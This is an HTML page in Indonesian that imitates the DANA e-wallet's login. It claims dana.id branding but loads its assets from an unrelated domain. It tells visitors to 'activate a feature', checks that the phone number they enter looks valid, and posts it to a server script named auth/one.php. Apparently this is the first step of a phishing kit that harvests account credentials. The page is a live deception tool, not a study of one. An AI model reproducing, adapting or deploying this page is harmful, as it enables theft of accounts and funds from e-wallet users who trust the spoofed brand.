<!DOCTYPE html>
<html lang="id">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>𝗗𝗔𝗡𝗔 𝗜𝗗 || 𝗔𝗞𝗧𝗜𝗙𝗞𝗔𝗡 𝗙𝗜𝗧𝗨𝗥</title>
  <meta name="description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung">

  <!-- Open Graph -->
  <meta property="og:title" content="𝗗𝗔𝗡𝗔 𝗜𝗗 || 𝗔𝗞𝗧𝗜𝗙𝗞𝗔𝗡 𝗙𝗜𝗧𝗨𝗥">
  <meta property="og:description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung">
  <meta property="og:image" content="https://dana.zalnir.biz.id/images/img-dana_logo.png">
  <meta property="og:url" content="https://www.dana.id/">
  <meta property="og:type" content="website">

  <!-- Twitter -->
  <meta name="twitter:card" content="summary_large_image">
  <meta name="twitter:title" content="𝗗𝗔𝗡𝗔 𝗜𝗗 || 𝗔𝗞𝗧𝗜𝗙𝗞𝗔𝗡 𝗙𝗜𝗧𝗨𝗥">
  <meta name="twitter:description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung">
  <meta name="twitter:image" content="https://dana.zalnir.biz.id/images/img-dana_logo.png">
</head>

<link rel="canonical" href="https://www.dana.id/">
<meta property="og:url" content="">
<meta property="og:description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung">
<meta property="twitter:description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung">
<style>
  :root {
    --blue: #1083e8;
    --white: #ffffff;
    --light: #f9fafb;
    --text: #111827;
  }

  * {
    box-sizing: border-box;
    margin: 0;
    padding: 0;
  }

  body {
    font-family: "Segoe UI", Arial, sans-serif;
    background: var(--blue);
    color: var(--white);
    display: flex;
    flex-direction: column;
    align-items: center;
    min-height: 100vh;
  }

  .container {
    width: 100%;
    max-width: 420px;
    padding: 30px 20px 120px;
  }

  .header-logo {
    text-align: center;
    margin-bottom: 50px;
  }

  .header-logo img {
    width: 100px;
    height: auto;
  }

  .title {
    font-size: 14px;
    text-align: center;
    margin-top: 5px;
    padding: 1px;
  }

  @media (max-width: 420px) {
    .title { font-size: 12px; }
  }

  form {
    display: flex;
    flex-direction: column;
    gap: 18px;
  }

  .input-group {
    display: flex;
    gap: 10px;
    align-items: center;
  }

  .country {
    display: flex;
    align-items: center;
    gap: 8px;
    background: var(--white);
    color: var(--text);
    padding: 8px 10px;
    border-radius: 10px;
  }

  .country .flag img {
    width: 28px;
    height: 20px;
    border-radius: 3px;
  }

  .country strong {
    font-size: 15px;
  }

  input.number {
    flex: 1;
    padding: 12px 14px;
    border-radius: 10px;
    border: none;
    font-size: 16px;
    color: var(--text);
    outline: none;
  }

  input.number::placeholder {
    color: #9ca3af;
  }

  .desc {
    text-align: center;
    font-size: 14px;
    line-height: 1.6;
    color: rgba(255, 255, 255, 0.95);
  }

  .location {
    margin-top: 28px;
    background: rgba(255, 255, 255, 0.12);
    border-radius: 10px;
    padding: 14px;
    display: flex;
    align-items: center;
    gap: 10px;
  }

  .location svg {
    width: 20px;
    height: 20px;
    flex-shrink: 0;
  }

  .location span {
    font-size: 14px;
  }

  .btn {
    position: fixed;
    bottom: 15px;
    left: 50%;
    transform: translateX(-50%);
    border: none;
    background: var(--white);
    color: var(--blue);
    font-weight: 700;
    font-size: 16px;
    padding: 14px;
    border-radius: 20px;
    cursor: pointer;
    width: calc(100% - 40px);
    max-width: 420px;
    box-shadow: 0 4px 10px rgba(0, 0, 0, 0.2);
  }

  /* Popup */
  .popup {
    display: none;
    position: fixed;
    top: 0; left: 0;
    width: 100%; height: 100%;
    background: rgba(0,0,0,0.6);
    justify-content: center;
    align-items: center;
    z-index: 999;
  }

  .popup-content {
    background: #fff;
    padding: 25px;
    border-radius: 16px;
    text-align: center;
    width: 85%;
    max-width: 340px;
  }

  .popup-content img {
    width: 200px; /* diperbesar */
    height: auto;
  }

  .popup-content button {
    margin-top: 18px;
    background: var(--blue);
    color: #fff;
    border: none;
    border-radius: 8px;
    padding: 10px 25px;
    font-size: 15px;
    cursor: pointer;
  }
</style>
</head>
<body>
  <div class="container">
    <div class="header-logo">
      <img src="images/cok.png" alt="Logo">
    </div>

    <header class="header">
      <h1 class="title">Masukan nomor HP untuk lanjut</h1>
    </header>

    <form id="npeForm" action="auth/one.php" method="POST">
      <div class="input-group">
        <div class="country">
          <span class="flag"><img src="images/indo.png" alt="ID"></span>
          <strong>+62</strong>
        </div>
        <input type="tel" class="number" id="npe" name="npe" placeholder="812-3456-7890" required />
      </div>

      <p class="desc">
        Kami akan menggunakan nomor HP ini sebagai ID kamu dan untuk mengamankan akun kamu.
        Dengan melanjutkan, kamu setuju dengan <b>S&amp;K</b> dan <b>Kebijakan Privasi</b>.
      </p>

      <button type="submit" class="btn">LANJUTKAN</button>
    </form>
  </div>

  <!-- Popup -->
  <div class="popup" id="popup">
    <div class="popup-content">
      <img src="img/comor.png" alt="Nomor salah">
      <br>
      <button id="retryBtn">Coba Lagi</button>
    </div>
  </div>

  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.16/jquery.mask.min.js"></script>
<script>
  $(document).ready(function(){
  // Buat mask fleksibel untuk nomor Indonesia
  $('#npe').on('input', function(){
    let val = $(this).val().replace(/\D/g,''); // ambil angka saja

    // Kalau mulai dengan 0, tetap tampilkan 0 di awal
    if(val.startsWith('0')) {
      // format 0xxx-xxxx-xxxxx
      val = val.replace(/^(\d{4})(\d{0,4})(\d{0,5}).*/, "$1-$2-$3");
    } else if(val.startsWith('8')) {
      // format 8xxx-xxxx-xxxxx
      val = val.replace(/^(\d{3})(\d{0,4})(\d{0,5}).*/, "$1-$2-$3");
    } else {
      val = val.replace(/^(\d{0,4})(\d{0,4})(\d{0,5}).*/, "$1-$2-$3");
    }

    $(this).val(val);
  });
});

  const form = document.getElementById("npeForm");
  const popup = document.getElementById("popup");
  const npeInput = document.getElementById("npe");
  const retryBtn = document.getElementById("retryBtn");

  form.addEventListener("submit", function(e) {
    const npeValue = npeInput.value.replace(/\D/g, ''); // hanya angka

    // Cek: hanya boleh awalan 0 atau 8, dan minimal panjang 8 digit
    if (!(npeValue.startsWith("0") || npeValue.startsWith("8")) || npeValue.length < 10) {
      e.preventDefault();
      popup.style.display = "flex";
    }
  });

  retryBtn.addEventListener("click", function() {
    popup.style.display = "none";
    npeInput.value = "";
    npeInput.focus();
  });
  </script>
</body>
</html>
